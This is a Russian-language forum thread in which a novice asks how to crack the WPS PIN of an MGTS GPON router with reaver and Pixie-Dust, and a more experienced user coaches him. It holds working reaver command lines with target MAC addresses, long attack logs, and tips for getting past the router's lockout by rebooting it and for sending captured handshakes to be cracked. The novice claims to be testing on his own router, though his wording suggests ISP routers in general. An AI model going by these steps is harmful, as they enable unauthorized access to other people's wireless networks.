[P] E-Nonce: 0b:f4:96:98:4c:4d:eb:70:3c:8b:7f:5e:65:8d:f2:c4

[P] PKE: b3:7a:64:b3:1d:73:26:b1:4c:db:a7:f9:c6:c0:0f:fa:38 :1e:31:39:0f:96:b4:c6:eb:3d:03:fd:84:1e:82:8d:5b:c 9:a3:c3:42:2d:d5:d9:3e:a9:8c:7f:41:66:38:90:d9:b7: 8d:5b:23:88:d6:ea:d0:73:40:d3:23:f4:f3:e2:b1:5e:ea :3b:57:b0:3c:24:10:1d:54:36:15:ea:34:8a:65:a6:d2:7 9:e2:78:72:dd:f6:99:4b:68:3e:1c:e6:f3:c6:37:56:c5: 7b:37:43:9e:06:13:b7:ba:5e:ea:06:ae:dd:7b:a7:0b:3c :8e:25:1e:11:e9:26:a4:ba:eb:ae:60:54:ae:8e:c7:21:8 3:9a:c9:1e:d6:eb:9f:08:ab:8b:1e:66:11:ac:e8:d6:b8: ed:de:ef:86:0b:bc:17:cc:d1:c3:a7:9a:a5:67:49:ee:e1 :5c:3e:2a:c3:2b:8c:47:74:95:14:e3:f6:c6:62:72:00:5 1:84:d8:6c:a8:d1:48:af:c3

[+] Sending EAPOL START request

[!] WARNING: Receive timeout occurred

[+] Sending EAPOL START request

[!] WARNING: Receive timeout occurred

[+] Sending EAPOL START request

[!] WARNING: Receive timeout occurred



Меня смущает:

[+] Trying pin 88885674.

[+] 0.09% complete.

гонял около 2 часов процесс и пин стоит на месте

Сильно не ругайте я зеленый еще! скопировал минимум .

подрузамеваю что роутер залочен как разлочить неужели рубильник ) ?

Еще вопрос можно ли хеншейк прогнать по словарю на пин, а пин прогнать через ривер) ?

x10
24.12.2016, 11:00
К дополнению, потестил на своем роутере MGTS_GPON **** интсрумент mdk3, к сожалению нужно находиться в непосредственной близостик к роутеру из за слабого сигнала карточки в ноутбуке мощность которую повысить нельзя( обидно .

После ручного ребута роутера, попрежнему дается только 10 попыток подбора пина! помогите) я так близко)

binarymaster
24.12.2016, 14:19
подрузамеваю что роутер залочен



Так и есть. И при таком раскладе pixiewps не сможет получить все нужные данные.



как разлочить неужели рубильник ) ?



Именно.



Еще вопрос можно ли хеншейк прогнать по словарю на пин



Можно, в теме словарей был словарь всех возможных WPS PIN кодов. Только у MGTS GPON таких паролей обычно не водится, вот TP-LINK таким словарём есть смысл прогонять.



а пин прогнать через ривер) ?



Если пароль будет найден, уже нет смысла прогонять пин.



з за слабого сигнала карточки в ноутбуке мощность которую повысить нельзя(



Внешние адаптеры с антеннами наше всё.

x10
24.12.2016, 17:10
Так и есть. И при таком раскладе pixiewps не сможет получить все нужные данные.

Именно.

Можно, в теме словарей был словарь всех возможных WPS PIN кодов. Только у MGTS GPON таких паролей обычно не водится, вот TP-LINK таким словарём есть смысл прогонять.

Если пароль будет найден, уже нет смысла прогонять пин.

Внешние адаптеры с антеннами наше всё.



СПУСТИл НА ЗЕМЛЮ(

А с этим то как быть, После ручного ребута роутера, попрежнему дается только 10 попыток подбора пина! неужели постоянно ребут,получается взлом гадского мгтс становится невыпонимым!?

binarymaster
24.12.2016, 18:20
неужели постоянно ребут



Если pixiewps не находит пин код сразу, то:

1. Попробовать ещё пару раз

2. Подбирать все возможные пины, периодически перезагружая девайс (но это геморрой)

3. Словить хендшейк, скинуть в тему подбора



а можно ли прогнать пароль wps по типу хендшейка что бы ноутбук постоянно не долбился к роутеру?Тогда взлом был бы намного быстрее



Тогда бы все уже давно так делали. Pixiewps в общем-то это и делает, но такое возможно только при некачественном рандоме при генерации хешей, а это уязвимость.

x10
24.12.2016, 18:55
Если pixiewps не находит пин код сразу, то:

1. Попробовать ещё пару раз

2. Подбирать все возможные пины, периодически перезагружая девайс (но это геморрой)

3. Словить хендшейк, скинуть в тему подбора

Тогда бы все уже давно так делали. Pixiewps в общем-то это и делает, но такое возможно только при некачественном рандоме при генерации хешей, а это уязвимость.



Pixiewps не пробывал. надо на своем роутере по эксперементировать токо разобратся с прогой надо....

binarymaster
24.12.2016, 20:02
Pixiewps не пробывал






reaver -i wlan0mon -b 94:4A:0C:40:40:9D -a -vv -L -K 1



Пробовали, у вас в команде "-K 1" у reaver. Но видимо до роутера не доходило.

И только сейчас заметил, зачем у вас флаг "-a"? Вы ассоциацию с точкой вручную проводите? Или откуда-то копируете команды без понимания?

x10
24.12.2016, 22:18
Пробовали, у вас в команде "-K 1" у reaver. Но видимо до роутера не доходило.

И только сейчас заметил, зачем у вас флаг "-a"? Вы ассоциацию с точкой вручную проводите? Или откуда-то копируете команды без понимания?



как я понял это команда отвечает за автоопределение лучшего перебора вот и поставил)

binarymaster
24.12.2016, 22:30
как я понял это команда отвечает за автоопределение лучшего перебора вот и поставил)



Так я и думал.

В общем, пробуйте вот так (когда точка разлочится):

reaver -i wlan0mon -c # -b 94:4A:0C:40:40:9D -vv -K 1


И номер канала точки укажите вместо решётки.

x10
24.12.2016, 23:15
Так я и думал.

В общем, пробуйте вот так (когда точка разлочится):

reaver -i wlan0mon -c # -b 94:4A:0C:40:40:9D -vv -K 1<br/>

И номер канала точки укажите вместо решётки.



jr

ок сейчас попробую отпишу. пока эксперементию на своей точке с ребутом проблем нет все упирается в количество попыток , а их всего 10(



root@kali:~# reaver -i wlan0mon -b D4:21:22:FF:27:76 -vv --lock-delay=60 -K 1

Reaver v1.5.2 WiFi Protected Setup Attack Tool

Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

mod by t6_x <[email protected]> & DataHead & Soxrok2212

[?] Restore previous session for D4:21:22:FF:27:76? [n/Y]

[+] p1_index set to 30

[+] p2_index set to 0

[+] Restored previous session

[+] Waiting for beacon from D4:21:22:FF:27:76

[+] Switching wlan0mon to channel 1

[+] Associated with D4:21:22:FF:27:76 (ESSID: MGTS_GPON_0793)

[+] Starting Cracking Session. Pin count: 30, Max pin attempts: 11000

[+] Trying pin 00195676.

[+] Sending EAPOL START request

[+] Received identity request

[+] Sending identity response

[P] E-Nonce: 41:5a:94:dc:43:2e:de:0d:31:fb:c1:53:59:47:2a:ac

[P] PKE: c6:dd:34:30:b5:83:e8:59:9b:a8:aa:45:f0:42:8a:6d:21 :e7:d1:e9:65:33:4b:b0:9e:98:7c:ff:67:36:d6:4b:09:0 6:b7:48:8f:80:48:01:b7:7c:a1:57:89:21:d4:a9:58:af: ce:34:4c:38:4c:4f:78:9e:6a:f4:17:1e:c1:b0:0a:3d:44 :e5:a7:54:f0:e6:b4:42:58:eb:a0:cb:9d:64:53:01:fd:2 0:70:1a:ff:2f:58:8e:62:79:f6:95:e5:3c:28:19:e6:15: 86:50:4e:91:15:2b:47:83:f9:b4:48:4c:67:d7:b2:90:df :20:e3:07:fc:83:53:29:4d:f4:36:6b:4d:68:a5:3a:ae:d 5:f9:a5:57:18:a5:7b:e6:23:8d:f3:af:f7:c2:ff:15:ed: 9d:76:aa:e7:76:cc:3c:85:dc:47:b6:09:7b:e3:7d:8f:d9 :b0:dd:f1:36:df:dd:b4:ce:d4:c0:bc:39:b7:22:9b:cb:d 2:79:40:66:98:72:95:32:b6

[P] WPS Manufacturer: SERCOMM

[P] WPS Model Name: RV6688BCM

[P] WPS Model Number: RV6688BCM

[P] Access Point Serial Number: 53434F4D14150793

[+] Received M1 message

[P] R-Nonce: a0:96:b9:d2:5e:98:20:82:75:4c:44:96:64:0d:0b:23

[P] PKR: c5:14:14:4f:e1:df:0b:1c:e1:49:a3:22:ad:8f:88:64:7a :73:0b:05:59:c0:a7:ee:10:9c:d3:9c:93:6b:73:42:e1:5 0:93:4e:1f:f3:15:8c:13:58:02:72:9d:c1:3b:45:82:44: 7b:0e:59:28:50:34:bd:12:e3:5f:ba:a5:34:57:b5:49:9b :c4:08:09:ab:29:11:81:0e:cb:55:8e:82:ab:fe:26:4b:8 8:aa:4e:67:24:fc:4b:ae:f0:87:4a:87:b8:db:1c:a4:d4: a3:c6:91:d2:0c:c6:22:9e:d2:7b:1b:97:1f:dc:88:0b:71 :3c:d9:c5:67:fd:59:b6:cd:fc:4a:a9:80:8d:56:d6:1e:c 0:d4:36:dd:c1:a7:52:60:17:f4:8d:49:cb:28:5d:4b:b8: 46:59:4e:af:3d:09:c3:ae:c4:bb:69:70:f3:7f:5b:cc:f5 :2b:8b:09:dd:30:7c:5a:21:f7:54:72:63:40:f4:57:98:d 1:a6:f1:4f:01:cd:4b:75:d8

[P] AuthKey: 79:d6:07:86:98:84:51:82:2a:db:3f:5f:3b:e5:39:1a:32 :65:c0:28:a2:e5:90:31:fc:43:65:5d:c4:ce:20:ca

[+] Sending M2 message

[P] E-Hash1: 9e:c6:5c:68:11:24:dc:f0:79:12:ca:10:17:5d:93:f8:12 :41:74:ba:23:e8:49:95:67:26:1b:16:aa:69:51:92

[P] E-Hash2: 9c:d6:82:f1:3a:32:e8:1b:e3:9d:28:bb:08:db:85:ee:83 :a0:bf:b7:ed:10:98:69:6b:6e:b4:64:02:78:19:68

[Pixie-Dust]

[Pixie-Dust] Pixiewps 1.2<br/>
[Pixie-Dust]<br/>
[Pixie-Dust] [-] WPS pin not found!<br/>
[Pixie-Dust]<br/>
[Pixie-Dust] Time taken: 0 s 137 ms


Я ПРАВИЛЬНО ПОНИМАЮ PIXIEWPS -K 1 не поможет уязвимости нет!?

Попробывал еще так :






[<br/>
reaver -i wlan0mon -b D4:21:22:FF:27:76 -vv -t=30 -d=40 -l=61





<br/>
Reaver v1.5.2 WiFi Protected Setup Attack Tool<br/>
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]><br/>
mod by t6_x <[email protected]> & DataHead & Soxrok2212<br/>
<br/>
[?] Restore previous session for D4:21:22:FF:27:76? [n/Y] y<br/>
[+] p1_index set to 40<br/>
[+] p2_index set to 0<br/>
[+] Restored previous session<br/>
[+] Waiting for beacon from D4:21:22:FF:27:76<br/>
[+] Switching wlan0mon to channel 11<br/>
[+] Associated with D4:21:22:FF:27:76 (ESSID: MGTS_GPON_0793)<br/>
[+] Starting Cracking Session. Pin count: 40, Max pin attempts: 11000<br/>
[+] Trying pin 00295673.<br/>
[+] Sending EAPOL START request<br/>
[+] Received identity request<br/>
[+] Sending identity response<br/>
[P] E-Nonce: 05:b7:97:14:7e:4a:65:6c:4c:53:be:0c:5c:cf:d3:f4<br/>
[P] PKE: cc:80:33:29:99:86:18:56:e6:6f:0f:1a:f1:80:08:89:57 :5a:de:0b:59:d2:ba:5c:e5:a7:93:aa:d5:b8:c6:34:fb:d c:95:91:f7:94:31:54:c0:2a:d9:90:f7:6a:19:57:ed:dc: 38:67:c8:57:80:3c:07:55:ce:26:9c:33:a9:78:bd:18:4f :3a:e0:47:1a:ce:c0:41:c1:45:01:38:5b:a6:07:65:5a:e 5:76:81:72:f2:fe:34:33:05:e7:61:d4:ec:f9:b7:ec:4a: f8:77:a4:a3:36:cd:84:1f:80:28:8c:33:7c:04:50:64:3e :8f:01:12:47:4b:4f:e5:85:d2:0f:e1:bc:e3:d9:d0:99:e e:5f:f2:b0:4d:1f:fb:08:98:30:8c:52:b3:dd:49:8e:6d: 1f:e2:7c:b2:be:6b:9d:6d:4d:da:dc:e5:e1:54:7c:50:72 :fe:40:3a:fe:b4:9a:6a:82:53:bb:3c:2e:e9:99:dd:72:d 2:e1:5e:a8:4c:d0:fb:42:9d<br/>
[P] WPS Manufacturer: SERCOMM<br/>
[P] WPS Model Name: RV6688BCM<br/>
[P] WPS Model Number: RV6688BCM<br/>
[P] Access Point Serial Number: 53434F4D14150793<br/>
[+] Received M1 message<br/>
[P] R-Nonce: 56:d6:4b:99:ab:94:5e:90:70:d3:f5:3c:3b:8c:f8:7b<br/>
[P] PKR: ca:2b:75:e0:46:ba:57:5c:15:2f:97:76:56:f5:cb:55:7b :3e:20:a5:0c:2f:af:82:61:f3:b0:96:fb:7b:06:05:f4:b 9:77:50:e8:55:e6:e7:b8:67:40:2a:21:74:6d:fc:89:cd: 66:9d:26:45:1e:3d:68:ca:15:15:71:6b:d3:7e:00:de:1a :4f:3f:c5:9c:1c:f6:68:49:9c:55:9d:ef:7f:9b:15:dc:c 2:3b:b8:56:ba:09:a6:8e:dc:e7:90:63:a7:3d:c3:9e:7d: 86:e5:34:37:8c:53:76:6f:76:66:c4:28:9a:e7:d5:c8:8c :31:da:1f:1a:ad:b8:3b:7c:5e:a7:a4:ca:2f:e4:15:04:c 5:38:3b:74:ba:b3:b5:a7:4a:f5:d2:7b:9e:0e:fb:f4:a3: 52:70:72:a3:ca:97:4c:8b:aa:1d:b4:8e:79:b9:08:59:7d :b3:fe:35:78:a7:f7:fd:22:73:4b:df:04:90:88:99:e5:5 4:4b:3a:48:8f:cb:a5:41:02<br/>
[P] AuthKey: a3:73:10:7f:f5:70:25:df:41:f0:f5:fb:e1:eb:bb:8d:1a :a5:df:e5:f5:11:be:dc:55:1b:c0:17:d3:46:11:d3<br/>
[+] Sending M2 message<br/>
[P] E-Hash1: 4c:cb:07:c4:1b:ab:e2:9f:cc:09:5b:27:92:8f:6a:fb:f9 :5b:cd:e6:60:4c:cf:14:19:34:d5:73:e3:d8:a4:11<br/>
[P] E-Hash2: 13:8b:ac:eb:e6:26:0b:cc:40:ba:a6:0a:13:a2:3e:c5:f0 :f2:53:48:68:93:d0:ae:7a:0b:4c:50:ee:25:de:ee<br/>
[+] Received M3 message<br/>
[+] Sending M4 message<br/>
[+] Received WSC NACK<br/>
[+] Sending WSC NACK<br/>
[+] p1_index set to 41<br/>
[+] Pin count advanced: 41. Max pin attempts: 11000<br/>
[+] Trying pin 00305679.<br/>
[+] Sending EAPOL START request<br/>
[!] WARNING: Receive timeout occurred<br/>
[+] Sending EAPOL START request<br/>
/QUOTE]<br/>
<br/>
ПОСЛЕ 10 ПОПЫТОК<br/>
[!] WARNING: Detected AP rate limiting, waiting 0 seconds before re-checking<br/>
[!] WARNING: Detected AP rate limiting, waiting 0 seconds before re-checking<br/>
<br/>
ТВОЙ ВАРИАНТ<br/>
<br/>
root@kali:~# reaver -i wlan0mon -c 11 -b D4:21:22:FF:27:76 -vv -K 1

<br/>
Reaver v1.5.2 WiFi Protected Setup Attack Tool<br/>
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]><br/>
mod by t6_x <[email protected]> & DataHead & Soxrok2212<br/>
<br/>
[+] Switching wlan0mon to channel 11<br/>
[?] Restore previous session for D4:21:22:FF:27:76? [n/Y] Y<br/>
[+] p1_index set to 50<br/>
[+] p2_index set to 0<br/>
[+] Restored previous session<br/>
[+] Waiting for beacon from D4:21:22:FF:27:76<br/>
[+] Associated with D4:21:22:FF:27:76 (ESSID: MGTS_GPON_0793)<br/>
[+] Starting Cracking Session. Pin count: 50, Max pin attempts: 11000<br/>
[+] Trying pin 00395670.<br/>
[+] Sending EAPOL START request<br/>
[+] Received identity request<br/>
[+] Sending identity response<br/>
[P] E-Nonce: 5c:fb:71:a7:30:7f:ab:0e:00:c7:83:d2:5b:5e:98:dc<br/>
[P] PKE: 67:11:71:72:85:10:7d:8e:4b:69:47:b4:c6:60:05:a2:3d :5a:75:ca:5e:5f:e7:e0:16:bd:3c:87:fc:8e:40:62:62:3 9:5b:50:1e:fa:fb:23:5f:7f:1c:7d:27:4f:93:dc:ab:9f: 35:f0:1e:5c:d9:79:a5:6a:2d:d4:bc:80:2e:61:a2:bc:2b :1b:10:e4:44:0d:78:51:8c:bd:a2:c8:24:87:9b:f3:76:c 6:b3:d2:a0:aa:05:ed:35:2c:11:34:f8:69:32:75:58:4b: 2b:37:0a:25:a9:70:33:42:21:15:8f:a8:5c:ff:33:4c:96 :d7:12:64:cb:fa:33:6a:bf:46:36:27:80:42:86:0f:4b:8 a:16:39:83:5b:b2:37:ae:34:11:c2:fd:72:12:a3:67:95: 82:a4:b6:3a:85:95:34:64:e1:bd:3d:5d:ff:e0:91:41:91 :ad:a2:ce:b5:e1:f2:a0:ea:b6:9f:37:31:66:28:4c:0e:d 2:be:ea:4c:6c:13:86:85:d6<br/>
[P] WPS Manufacturer: SERCOMM<br/>
[P] WPS Model Name: RV6688BCM<br/>
[P] WPS Model Number: RV6688BCM<br/>
[P] Access Point Serial Number: 53434F4D14150793<br/>
[+] Received M1 message<br/>
[P] R-Nonce: 99:2c:e0:0e:6a:1c:68:25:d1:b4:c6:99:85:4f:c8:da<br/>
[P] PKR: c3:25:e1:f2:3b:e4:80:52:d2:81:d5:81:ff:dc:a8:17:58 :a7:91:65:5f:b5:22:ee:2b:4b:a4:e7:c0:ef:69:d9:67:f 8:4a:06:10:99:5c:0c:c9:d4:a9:99:f4:ee:b0:47:d8:02: 40:05:9d:9e:9f:94:79:b2:fd:96:3d:d3:a0:f5:a8:dc:4a :54:8e:f2:3f:8a:00:25:9e:b8:09:6b:1c:4c:32:f7:ee:4 0:92:54:54:b1:4d:ff:fd:4e:57:a9:4f:3c:9c:30:54:1f: 65:bf:63:74:65:57:43:84:2a:0c:17:64:bc:2e:93:8a:7f :6d:ca:5e:ab:63:3e:82:2b:8d:8f:97:05:f8:6c:9a:b4:a 4:8e:b5:b9:8f:6c:c8:dd:42:97:d7:89:59:db:9e:79:12: 0c:a2:58:89:80:c2:10:f3:37:d5:56:ec:87:fc:87:85:f5 :67:f3:74:95:81:49:f7:83:d5:60:b7:9d:f8:05:e1:9a:a f:ac:f7:5e:c8:58:9a:7b:a2<br/>
[P] AuthKey: f7:9f:68:d4:1b:83:8a:62:05:18:78:c8:7b:76:46:e9:1a :82:2c:8d:e8:84:aa:56:f6:02:75:d0:42:f2:c4:78<br/>
[+] Sending M2 message<br/>
[P] E-Hash1: 3f:ef:f5:5d:a7:6e:f1:14:5d:b8:38:ce:88:9d:e5:10:4c :96:c9:ad:f3:49:21:d5:99:06:0c:77:d1:cd:c6:18<br/>
[P] E-Hash2: f0:6d:2e:a6:3a:46:74:b1:e6:c9:9f:fa:f6:4e:a3:24:ee :92:43:87:cd:f9:ec:ee:06:19:c1:ef:3f:60:62:2b<br/>
[Pixie-Dust]<br/>
[Pixie-Dust] Pixiewps 1.2<br/>
[Pixie-Dust]<br/>
[Pixie-Dust] [-] WPS pin not found!<br/>
[Pixie-Dust]<br/>
[Pixie-Dust] Time taken: 0 s 320 ms<br/>
[Pixie-Dust]<br/>
root@kali:~# reaver -i wlan0mon -c 11 -b D4:21:22:FF:27:76 -vv

<br/>
Reaver v1.5.2 WiFi Protected Setup Attack Tool<br/>
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]><br/>
mod by t6_x <[email protected]> & DataHead & Soxrok2212<br/>
<br/>
[+] Switching wlan0mon to channel 11<br/>
[?] Restore previous session for D4:21:22:FF:27:76? [n/Y] Y<br/>
[+] p1_index set to 50<br/>
[+] p2_index set to 0<br/>
[+] Restored previous session<br/>
[+] Waiting for beacon from D4:21:22:FF:27:76<br/>
[+] Associated with D4:21:22:FF:27:76 (ESSID: MGTS_GPON_0793)<br/>
[+] Starting Cracking Session. Pin count: 50, Max pin attempts: 11000<br/>
[+] Trying pin 00395670.<br/>
[+] Sending EAPOL START request<br/>
[+] Received identity request<br/>
[+] Sending identity response<br/>
[P] E-Nonce: 6a:0a:cb:52:25:63:c8:3d:22:8f:a8:82:72:e4:13:38<br/>
[P] PKE: 96:3b:91:fd:bb:d0:7b:69:9f:10:81:54:c3:29:d1:fe:b8 :7a:36:95:4c:5d:90:c7:a2:2b:af:cb:d9:ae:37:0f:7e:4 8:b2:c4:a9:fc:03:cd:1c:5f:37:63:e9:30:bf:91:95:86: a6:0a:a6:57:66:b8:8b:0c:19:34:6a:49:e6:a3:3e:a7:a5 :e4:1d:fe:6f:0a:77:d2:ef:96:51:fa:83:77:4d:d7:e5:6 1:a4:6f:4c:15:ba:19:6d:4a:64:9e:cc:eb:b5:cc:4e:25: f4:13:47:c0:55:e0:45:e6:e3:e2:4f:e7:74:0b:18:af:49 :f2:9a:78:f2:b9:03:a2:2d:9f:35:6b:11:86:a2:b3:e5:c 0:bd:9d:85:d1:fc:e5:59:f5:10:10:94:23:f9:6a:7f:ba: e2:51:6c:29:79:d4:57:b4:32:3c:ef:22:79:d7:3f:49:29 :68:df:b3:f3:de:29:af:f5:6c:fe:e6:67:07:fb:3d:94:b d:1e:40:fc:8c:d5:e2:35:10<br/>
[P] WPS Manufacturer: SERCOMM<br/>
[P] WPS Model Name: RV6688BCM<br/>
[P] WPS Model Number: RV6688BCM<br/>
[P] Access Point Serial Number: 53434F4D14150793<br/>
[+] Received M1 message<br/>
[P] R-Nonce: 83:6c:b9:1a:c8:55:ec:7e:d9:47:06:6e:68:cb:32:09<br/>
[P] PKR: fd:7d:0d:ab:2c:79:4e:96:6e:08:65:b4:3e:7e:37:19:48 :aa:ae:84:29:e3:f6:51:28:78:1d:bc:38:e5:d6:e5:74:6 3:54:7a:7c:1f:aa:3c:8f:19:28:a2:04:6c:32:9b:6d:88: 92:58:07:be:a8:ee:78:95:42:a3:3d:5f:f6:3b:3e:da:50 :27:80:84:59:cc:7f:c3:f0:ec:fe:4e:51:8a:85:38:60:8 7:2d:5d:0a:cb:75:a5:de:82:ad:74:a5:d0:26:02:12:b5: 4e:12:68:96:5d:3d:26:f2:c5:b0:f4:b2:fc:41:1f:d9:26 :80:c5:88:9d:77:52:12:bc:9c:38:42:47:ad:e6:ac:ca:1 6:54:da:06:9b:96:64:57:ba:b3:ff:48:e7:6f:fc:f1:34: c2:92:57:17:04:5a:72:a7:35:02:e3:4e:d2:f4:89:f4:74 :fb:8d:78:8b:87:04:91:94:eb:9c:36:b2:4d:49:15:8c:2 f:5e:89:1e:b6:c9:a1:01:88<br/>
[P] AuthKey: 62:38:32:de:1a:6a:e2:90:1a:0e:04:dd:de:f2:d0:b1:dd :0f:c9:37:b7:49:b5:a6:bc:db:f0:fc:04:c6:45:fc<br/>
[+] Sending M2 message<br/>
[P] E-Hash1: 9f:80:e8:0a:24:03:20:e9:27:14:61:ea:e9:c1:e9:51:5c :52:47:8f:1c:6c:68:c4:ae:f1:c4:97:ec:c8:6a:ff<br/>
[P] E-Hash2: 1c:67:9a:8f:b9:b5:54:f6:c8:d5:5b:98:f1:18:e4:a1:33 :25:53:c1:82:ff:21:2e:3e:dc:66:be:54:81:a7:bd<br/>
[+] Received M3 message<br/>
[+] Sending M4 message<br/>
[+] Received WSC NACK<br/>
[+] Sending WSC NACK<br/>
[+] p1_index set to 51<br/>
[+] Pin count advanced: 51. Max pin attempts: 11000<br/>
[+] Trying pin 00405676.<br/>
[+] Sending EAPOL START request<br/>
[+] Received identity request<br/>
[+] Sending identity response<br/>
[P] E-Nonce: 45:ec:bf:15:4f:5f:b6:c4:30:35:fa:e0:04:ff:1c:97<br/>
[P] PKE: 52:77:c7:25:88:d5:c2:74:2f:c8:ba:ed:29:3a:36:35:55 :68:b3:00:1a:21:15:d2:88:8b:7e:e9:2e:5e:f5:0e:69:5 7:12:9d:20:b2:78:e5:fa:33:42:3f:1e:18:9d:d9:b9:d9: dd:f1:0b:00:26:30:c6:85:c3:b7:14:64:b3:7d:7f:07:73 :a1:e1:af:36:40:af:5e:7e:d8:98:94:6a:37:74:c0:d3:6 3:ec:f5:42:17:db:6c:a3:ff:6c:45:98:1e:d6:53:c0:2f: e0:06:0d:9f:18:6b:05:72:d9:92:3b:63:a7:92:4c:6e:f4 :ea:42:f5:49:d0:0b:97:9f:24:88:e9:90:58:1c:69:45:5 9:4b:84:d4:b6:4a:8d:7e:a6:b4:80:fe:b7:30:a1:dd:5d: a4:a0:91:69:2c:21:32:73:67:f7:24:3b:3d:15:0d:86:6b :53:0c:f8:25:d7:cd:cf:96:54:54:fa:59:93:e6:15:37:9 9:53:40:45:a7:47:6f:82:b7<br/>
[P] WPS Manufacturer: SERCOMM<br/>
[P] WPS Model Name: RV6688BCM<br/>
[P] WPS Model Number: RV6688BCM<br/>
[P] Access Point Serial Number: 53434F4D14150793<br/>
[+] Received M1 message<br/>
[P] R-Nonce: 88:b9:0a:b6:ac:16:51:8b:03:83:7b:5b:93:4f:ca:9a<br/>
[P] PKR: 91:20:69:00:0b:33:da:e1:3d:a0:cd:af:fb:4d:91:f1:51 :e0:58:09:a0:43:d0:1b:58:ce:d7:32:77:e7:6c:47:e4:e 3:05:b5:ca:a3:5a:27:c1:07:29:1e:e9:84:93:0e:dd:cc: 94:87:72:08:c1:7c:a5:41:a3:ea:2d:3b:22:55:be:60:73 :f7:6f:92:f2:ec:18:d5:d7:5d:7a:12:a8:f5:d3:92:70:8 4:c6:f6:ad:40:d9:43:5c:6c:94:d3:b1:1d:45:ad:78:0b: d2:e8:9f:9f:41:89:17:fb:28:7d:3c:5b:fe:d8:0e:f3:d3 :6b:62:67:b0:f8:7f:d4:ef:1b:e8:32:5e:bf:0c:5c:d1:f 2:7a:a9:72:b9:78:45:17:12:6d:bd:b3:8e:b9:7d:e8:b6: bf:27:ff:65:a4:56:ef:e9:a0:b7:ba:a3:8d:b6:0b:97:b6 :f7:cf:98:6c:45:9a:a9:fe:ec:ca:b8:1f:1b:83:91:0e:3 9:47:60:9e:63:ea:d8:85:93<br/>
[P] AuthKey: d6:a6:35:8d:c7:bd:75:21:55:67:62:4b:a5:6e:ca:a4:16 :cc:ee:87:98:39:2d:d4:e4:6b:91:74:fd:c1:62:0b<br/>
[+] Sending M2 message<br/>
[P] E-Hash1: 80:4d:4b:8c:9a:e9:12:d9:e6:4d:6f:bf:7a:15:21:7b:f2 :32:ca:8c:23:90:c1:6e:ad:7f:f0:67:b1:ca:62:a7<br/>
[P] E-Hash2: ec:57:e6:89:59:c8:8d:ba:39:0a:fc:94:1b:b7:55:c6:d0 :31:26:af:45:95:2d:bd:bb:05:4d:56:8a:24:bf:16<br/>
[+] Received M3 message<br/>
[+] Sending M4 message<br/>
[+] Received WSC NACK<br/>
[+] Sending WSC NACK<br/>
[+] p1_index set to 52<br/>
[+] Pin count advanced: 52. Max pin attempts: 11000<br/>
[+] Trying pin 00415675.<br/>
[+] Sending EAPOL START request<br/>
[+] Received identity request<br/>
[+] Sending identity response<br/>
[P] E-Nonce: 0f:0e:59:73:2d:64:92:89:23:e4:54:3b:3f:58:75:65<br/>
[P] PKE: da:d8:8e:d2:54:80:ee:07:5c:ba:68:d0:ee:a7:89:59:6b :af:79:bb:2a:f4:92:23:be:43:97:e3:69:c3:a6:d4:2e:b a:70:87:17:1e:9b:d8:16:f0:71:ce:2f:57:dd:83:dd:95: 36:78:a1:a3:7e:7c:17:8a:0a:ba:d6:ce:69:83:4c:dc:aa :18:9c:76:66:b6:2a:20:78:3a:cd:2d:02:87:b7:6a:1d:e 1:e9:c1:bd:d4:b1:87:ec:cc:21:63:99:48:6c:cc:74:73: 38:0d:c5:7c:9b:39:83:bf:f6:6b:4d:91:e4:26:ce:45:52 :12:c9:29:ff:45:13:7d:07:13:53:7a:eb:fe:f6:98:9b:b 5:e7:5f:fb:d6:1c:d1:cc:ee:73:0a:2b:6d:ca:ca:e4:54: d4:37:ee:9d:79:0a:54:50:a8:9b:d0:5a:9c:25:b9:7c:17 :6a:5a:31:92:f1:3d:ed:ad:48:df:28:f4:6f:70:01:de:8 d:5d:40:01:41:03:8b:6d:a2<br/>
[P] WPS Manufacturer: SERCOMM<br/>
[P] WPS Model Name: RV6688BCM<br/>
[P] WPS Model Number: RV6688BCM<br/>
[P] Access Point Serial Number: 53434F4D14150793<br/>
[+] Received M1 message<br/>
[P] R-Nonce: 5f:c8:f6:c4:d4:4d:01:d5:f7:6b:c9:44:ff:69:5b:00<br/>
[P] PKR: 1a:e8:63:63:1f:41:a8:9f:25:e7:22:44:b6:f0:d3:67:7b :d8:5e:a5:c6:88:d2:61:ac:74:6e:0f:0f:8c:f0:6b:71:0 3:5b:8c:1f:2c:2a:63:3f:f7:6a:51:3f:79:35:8f:9d:b9: 41:53:ab:46:5b:2d:fb:6c:10:89:f5:cf:8c:a1:3f:55:5c :e5:07:0e:91:60:01:95:43:33:b4:5b:f1:75:5b:9c:43:3 7:67:2e:fb:7a:68:9d:bd:ea:de:a6:e5:d4:90:f6:0d:14: 3f:65:41:99:8b:41:fd:41:3a:d7:d8:51:04:45:ce:9d:4e :f2:f4:2f:8a:be:89:a6:5f:69:ee:81:a5:f4:b3:72:f2:4 2:7f:c2:e4:12:a2:12:5c:4d:24:5c:5e:21:3c:7a:1f:c5: 72:41:15:4a:5a:68:c3:16:62:1e:49:55:4f:d4:40:0b:b5 :f2:85:45:08:0d:a8:01:06:60:af:ba:1a:dc:0e:bd:e1:1 3:5e:74:7a:8a:f4:42:e5:9e<br/>
[P] AuthKey: ff:72:b7:70:41:e8:3b:2a:5b:9d:04:43:8a:04:6d:a0:e7 :44:69:e9:e3:d4:64:a6:ff:65:e1:5f:00:e7:16:88<br/>
[+] Sending M2 message<br/>
[P] E-Hash1: 50:a5:5e:9f:b4:24:0a:68:46:00:2f:de:ff:cc:6d:48:d9 :b0:a3:89:b5:37:e9:cc:64:86:02:37:65:af:27:3a<br/>
[P] E-Hash2: 34:cf:bd:c7:b7:38:ae:57:26:75:ed:ad:04:32:4f:86:d1 :76:e0:0c:02:30:2a:21:4c:ed:38:bc:3c:23:c9:42<br/>
[+] Received M3 message<br/>
[+] Sending M4 message<br/>
[+] Received WSC NACK<br/>
[+] Sending WSC NACK<br/>
[+] p1_index set to 53<br/>
[+] Pin count advanced: 53. Max pin attempts: 11000<br/>
[+] Trying pin 00425674.<br/>
[+] Sending EAPOL START request<br/>
[+] Received identity request<br/>
[+] Sending identity response<br/>
[P] E-Nonce: 6a:e1:55:1e:57:61:77:44:71:a3:7c:f9:51:64:2c:7d<br/>
